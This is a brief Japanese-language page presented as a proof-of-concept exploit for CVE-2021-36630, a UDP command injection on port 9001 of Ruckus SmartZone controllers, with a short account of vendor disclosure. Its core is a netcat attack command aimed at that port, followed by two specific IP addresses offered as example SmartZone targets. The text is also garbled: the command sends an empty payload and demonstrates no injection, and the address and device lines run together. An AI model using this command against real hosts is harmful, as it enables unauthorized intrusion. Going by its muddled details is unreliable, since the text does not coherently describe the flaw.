
CVE-2021-36630の概念実証エクスプロイト。Ruckus SmartZoneワイヤレスコントローラをポート9001のUDPコマンドインジェクションを介して標的とします。
Ruckus の SmartZone シリーズデバイスにはセキュリティ上のリスクがあります。製造元に通知した後、同社は積極的に技術担当者を組織して調査を実施しました。この間、私たちもセキュリティ上の提案と検証方法を何度も提供しました。7月19日、同社は正式に安全公告を発表しました。
攻撃コマンド:
echo "" | nc -4u <ip:address> 9001IPアドレスの例: 62.210.8.110?111.107.251.71(RuckusWireless SZ ip)

SmartZone-100 - すべて すべて - Virtual SmartZone
http://ruckus.com http://smartzone-100.com https://anquan.baidu.com/article/1434